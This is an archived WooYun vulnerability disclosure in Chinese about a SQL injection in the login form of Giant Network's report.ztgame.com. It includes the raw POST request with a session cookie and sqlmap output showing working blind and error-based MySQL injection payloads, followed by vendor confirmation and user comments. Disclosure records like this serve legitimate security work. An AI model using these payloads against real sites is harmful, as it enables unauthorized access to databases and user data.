当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116922

漏洞标题:巨人网络某站存在SQL注入(99个数据库以及无数表沦陷)

相关厂商:巨人网络

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-05-29 13:13

修复时间:2015-07-13 16:16

公开时间:2015-07-13 16:16

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-29: 细节已通知厂商并且等待厂商处理中
2015-05-29: 厂商已经确认,细节仅向厂商公开
2015-06-08: 细节向核心白帽子及相关领域专家公开
2015-06-18: 细节向普通白帽子公开
2015-06-28: 细节向实习白帽子公开
2015-07-13: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全(由于数据库 以及表内容太多 不可能一一查看 所以随便找了两个库截图 这样不会走小厂商吧?)
---------------------------------------------------------------
最近几天大家可以留意下吵着要过儿童节的女孩。成年人想过儿童节,心理学上讲,这是一种缓解生活工作压力,排遣孤单寂寞的方式,潜意识里其实是想要有人关怀,甚至是一起制造儿童。你们不要嘲笑,要把握好这个机会。

详细说明:

https://report.ztgame.com/login.html POST注入

POST /do_login.php HTTP/1.1
Host: report.ztgame.com
Connection: keep-alive
Content-Length: 59
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://report.ztgame.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://report.ztgame.com/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: check_cookie_jsztgamecom=123; uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11%3A24%3A35; ref_date=2015-05-29+11%3A24%3A35; ref_ip=42.81.42.133; PHPSESSID=75c9s9867avo4unhsks9ed1se5
username=admin&password=admin&code=2680&submit=%CC%E1%BD%BB


保存后 丢进 sqlmap 里

1.png


sqlmap identified the following injection points with a total of 272 HTTP(s) req
uests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
Payload: username=admin' RLIKE (SELECT (CASE WHEN (6833=6833) THEN 0x61646d6
96e ELSE 0x28 END)) AND 'VovZ'='VovZ&password=admin&code=2680&submit=%CC%E1%BD%B
B
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 4022 FROM(SELECT COUNT(*),CONCAT(0x7161
697471,(SELECT (CASE WHEN (4022=4022) THEN 1 ELSE 0 END)),0x716d677271,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wpyi'='wpyi&
password=admin&code=2680&submit=%CC%E1%BD%BB
---
[12:37:20] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.4.4
back-end DBMS: MySQL 5.0


由于数据库 以及表内容太多 不可能一一查看 所以随便找了两个库截图

2.png


3.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-05-29 16:15

厂商回复:

内部正在评估

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-29 13:42 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    下注,我猜5分

  2. 2015-05-29 13:43 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @管管侠 我猜1分···

  3. 2015-05-29 16:55 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @管管侠 你看 我没说错吧

  4. 2015-05-29 16:59 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    庄家赢

  5. 2015-05-29 17:02 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @管管侠 他们家数据不值钱

  6. 2015-06-01 10:35 | 巨人网络(乌云厂商)

    @天地不仁 以万物为刍狗 非常感谢您的及时反馈,我们对此非常重视。但由于上周打分的同事,不是特别懂Rank的重要意义,所以没有客观的给予评价,我们对此感到愧疚。如果后续还有机会收到您的反馈,我们肯定给予高分。